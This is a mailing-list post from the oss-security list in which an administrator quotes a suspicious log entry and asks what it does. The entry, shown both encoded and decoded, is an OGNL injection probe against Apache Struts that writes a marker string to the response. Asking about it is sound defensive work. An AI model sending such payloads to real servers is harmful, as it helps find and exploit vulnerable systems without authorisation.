[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <alpine.BSF.2.00.1410310520030.57132@aneurin.horsfall.org>
Date: Fri, 31 Oct 2014 05:30:46 +1100 (EST)
From: Dave Horsfall <dave@...sfall.org>
To: OSS Security <oss-security@...ts.openwall.com>
Subject: Some weird Apache redirection exploit?
May not be Apache-specfic, but as it's the most popular server out
there...
What is it trying to do? I've never seen it in my logs before.
117.27.254.25 - - [31/Oct/2014:05:16:15 +1100] "GET ?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('[/ok-helo.wang]'),%23w.flush(),%23w.close()} HTTP/1.1" 200 7543 "-" "Python-urllib/2.6"
The perp (or rather, the 0wn3d box) is somewhere in China. When decoded, it
comes out as
GET ?redirect:${#w=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),#w.println('[/ok-helo.wang]'),#w.flush(),#w.close()}
but I'm none the wiser.
--
Dave Horsfall (VK2KFU) "Bliss is a MacBook with a FreeBSD server."
http://www.horsfall.org/spam.html (and check the home page whilst you're there)
Powered by blists - more mailing lists
Please check out the
Open Source Software Security Wiki, which is counterpart to this
mailing list.
Confused about mailing lists and their use?
Read about mailing lists on Wikipedia
and check out these
guidelines on proper formatting of your messages.
